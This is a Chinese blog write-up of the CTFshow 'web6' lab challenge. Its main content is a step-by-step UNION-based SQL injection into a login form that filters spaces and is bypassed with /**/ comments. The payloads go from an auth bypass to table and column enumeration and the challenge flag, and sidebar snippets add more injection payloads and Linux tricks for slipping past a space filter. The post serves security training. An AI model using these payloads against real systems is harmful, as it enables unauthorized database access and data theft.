CTF show web6 加上屏蔽的sql

最新推荐文章于 2022-08-25 11:30:22 发布
最新推荐文章于 2022-08-25 11:30:22 发布
阅读量149 收藏
点赞数
分类专栏: CTFshow 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43039823/article/details/119041171
版权

打开题目发现与web2 相似,但是尝试着用万能密码登录时显示其中存在违规字

猜测ban掉了万能密码里的其中一个字符

分析  admin' or 1=1#  

试试   username=1'2&password=123

username=1#2&password=123

username=1     2&password=123

发现在有空格时出现了违规字符提示,即题目把 空格  ban 了。

接下来的步骤与web2 时极为相似,下面我会用          /**/   代替空格

username=admin'/**/or/**/1=1#&password=123

 username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123


username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#&password=123


username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123


username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=123


username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag/**/,3/**/from/**/flag#&password=123

得出flag ctfshow{991e587f-45f0-47fb-a66b-82342f4b5a74}
 

是Enterprise!
关注
专栏目录
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1291
简单的SQL注入
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7256
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
CTF中的Web
mathor的博客
10-31 2213
做了这么多CTFWeb题,感觉部分题都是有套路的,故在这里总结下CTFWeb中常见的考点 “十八罗汉” CTF中的Web一般就以下十八个考点 直接查看源码 查看修改或添加Http请求头响应头 302跳转的中转网页有信息 查看开发者工具控制台 JavaScript代码,包括JS加解密 使用burp拦截 robots.txt asp,php代码审计 sql注入 简单脚本使用 后台登陆 代码逆向 上传...
ctfshow-WEB-web6
wangyuxiang946的博客
08-21 1万+
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过 先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输 a'or(true)# 成功登录 既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输 a'or(true)union(select(1),datab...
CTF比赛中,命令中空格被过滤的解决方法
a3320315的博客
08-19 6975
1、linux {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过) 2、windows下 (实用性不是很广,也就type这个命令可以用) ty...
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 5427
以pikachu靶场练习来学习ctf知识
CTF-Web5(00截断)
→_→
08-19 1318
5.上传绕过 题目名字和提示都说的很明确,这题是一道上传绕过的题目,点开题目链接,可以看到一个文件上传的界面: 这里可以尝试随便上传一些文件,看看效果: 先尝试上传一个jpg文件: 上传jpg文件的提示为必须上传后缀名为php的文件才行,那么我们再上传一个php文件: 上传的结果是告诉我们仅支持jpg,gif,png后缀的文件。 仅支持上传jpg,gif,png后缀的文件,但是上传后又会提示必须上传后缀名为php的文件才行。 那么现在这个问题该怎么去解决呢,目前有一个思.
CTF show 萌新区解题报告 (三)
qq_51090016的博客
03-01 1418
21—3021.隐写222.萌新隐写5萌新隐写6 21.隐写2 下载打开 提示jphs隐写,用jphs打开: 然后seek ,无密码, 设一个1.txt,这样隐藏的信息就会自动放在里面。 打开1.txt 22.萌新隐写5 下载打开看看: 这是啥啊?我人傻了 看上去像是编码,但这标题不是隐写么。。 看了wp才知道原来这是unicode编码,啥是unicode编码,百度看看 看不太懂。。只好跟着wp的过程去写了 先是从中文转换后得到 再16进制转化成字符 base64解密 咋不对??仔细一看,居然
ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4477
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
OFPPT-CTF 2022 部分writeup
ShenZ的博客
03-27 5119
OFPPT-CTF 2022WebLogseasy webLFIlibraryChocolatephp WebLogs easy web LFI library Chocolate php Cryptography Rome famous general Milkshake Transposition Forensics Shark Windows memory dump pcap analysis pcap analysis 2 pcap analysis 3 pcap analysis 4 pcap
CTF里面的WEB题的一些解决思路
热门推荐
DALE1186487104的博客
04-19 4万+
CTF里面解决WEB题的一些常用思路:(福利:末尾有视频链接)如图( 十八罗汉)                                                                                        PS:(下文的序列号是对图片中序列号的一些补充)WEB题中常用的工具                                    (1...
ctf 信息隐藏 html,ctf_web常见套路(一)
weixin_31412915的博客
06-03 3472
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?CTF_web出题常见套路(一)基础套路1.查看源码标志:不用标志,每个网页都可能隐藏信息。重要信息:1.各种敏感词汇:password,username,form,flag,key,tip等2.包含的内容都是重要提示信息3.其他php,txt文件index.txt,search_key.php等4.隐藏的form表单往...
ctf】空格被过滤了
chualam的博客
11-09 610
如果是系统命令 则cat<文件 则cat{IFS}文件 则cat<>文件 如果是sql注入 则union/**/select
CTF中常见Web源码泄露总结
大方子
10-04 2241
0x01 .hg源码泄漏 漏洞成因:   hg init的时候会生成.hg &lt;span class="pln"&gt;e&lt;/span&gt;&lt;span class="pun"&gt;.&lt;/span&gt;&lt;span class="pln"&gt;g&lt;/span&gt;&lt;span class=&qu
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8494
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Python基于机器学习的金融大数据风控建模实战源码+数据+pkl模型文件.zip
最新发布
10-10
Python基于机器学习的金融大数据风控建模实战源码+数据+pkl模型文件.zip
springcloud
10-10
springcloud
Java项目: 基于SpringBoot+mybatis+maven+vue+mysql在线教育系统(含源码+数据库+毕业论文)
10-10
一、项目简介 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,eclipse或者idea 确保可以运行! 该系统功能完善、界面美观、操作简单 二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.5及以上 后端:spring+springboot+mybatis+maven+mysql 前端: vue , css,js , elementui 三、系统功能 1、系统角色主要包括:管理员、用户、讲师 2、系统功能 后台主要功能包括: 首页 个人中心 修改密码 个人信息 用户管理 讲师管理 普通管理员管理 课程管理员管理 课程管理 课程分类管理 教师管理 名师管理 系统管理 订单管理 前台功能包括: 用户登录 用户注册 首页 课程信息推荐 课程详情 点我收藏 添加到购物车 立即购买 发表评论 教师信息推荐 个人中心 我的收藏 余额充值 后台管理 购物车等功能 详见 https://flypeppa.blog.csdn.net/article/details/142827942
mysqlSQL注入:CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值